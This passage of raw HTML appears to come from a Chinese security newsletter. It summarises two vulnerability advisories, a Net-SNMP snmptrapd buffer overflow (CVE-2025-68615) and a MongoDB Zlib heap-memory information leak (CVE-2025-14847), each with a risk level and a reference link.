0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Net-SNMP snmptrapd 缓冲区溢出漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-68615）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 76, 65);">严重</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://github.com/net-snmp/net-snmp/security/advisories/GHSA-4389-rwqf-q9gq" target="_blank">https://github.com/net-snmp/net-snmp/security/advisories/GHSA-4389-rwqf-q9gq</a></span></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Net-SNMP snmptrapd 被披露其存在缓冲区溢出漏洞，漏洞编号CVE-2025-68615。可导致远程攻击者通过发送特制的 SNMP 数据包，触发 snmptrapd 守护进程崩溃等危害。Net-SNMP 是一个广泛使用的、开源的简单网络管理协议（SNMP）工具套件和实现库，包含 SNMP 代理守护进程（如 snmpd、snmptrapd）、客户端工具、开发库以及大量的预编译 MIB（管理信息库）文件。 据官方描述，在 Net-SNMP 5.9.5 之前和 5.10.pre2 之前的所有版本中，其 snmptrapd 守护进程在处理网络数据包时存在缓冲区溢出漏洞，当攻击者向 snmptrapd 服务发送一个经过特殊构造的恶意 SNMP 数据包时，可能会导致程序在内存中写入超出预定缓冲区域边界的数据，从而破坏内存的完整性，最终引发守护进程崩溃，造成服务中断等。</span></p></div></div></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">MongoDB 信息泄露漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-14847）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 169, 0);">高危</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://jira.mongodb.org/browse/SERVER-115508" target="_blank">https://jira.mongodb.org/browse/SERVER-115508</a></span></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">MongoDB 官方发布安全通告，披露了其存在信息泄露漏洞，漏洞编号CVE-2025-14847。可导致未经身份验证的远程攻击者通过特制的 Zlib 压缩协议请求，读取服务器堆内存中未初始化的敏感数据等危害。MongoDB，一个基于分布式文件存储的数据库，旨在为 WEB 应用提供可扩展的高性能数据存储解决方案，是一款介于关系数据库和非关系数据库之间的产品。 据官方描述，在 MongoDB Server 的受影响版本中，当其处理使用 Zlib 压缩的协议消息时，对消息头部中的长度字段校验存在缺陷。若攻击者构造一个包含不匹配长度字段（例如，声明的长度大于实际压缩数据长度）的特制压缩消息并发送给 MongoDB 服务器，服务器在解压并处理该消息的过程中，可能基于声明的长度从堆内存缓冲区中读取超出实际数据范围的数据。这些超出部分的数据是先前残留在堆内存中、未经过初始化的旧数据，从而导致服务器在响应中包含这些本不应被访问的内存残片信息。</span></p></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 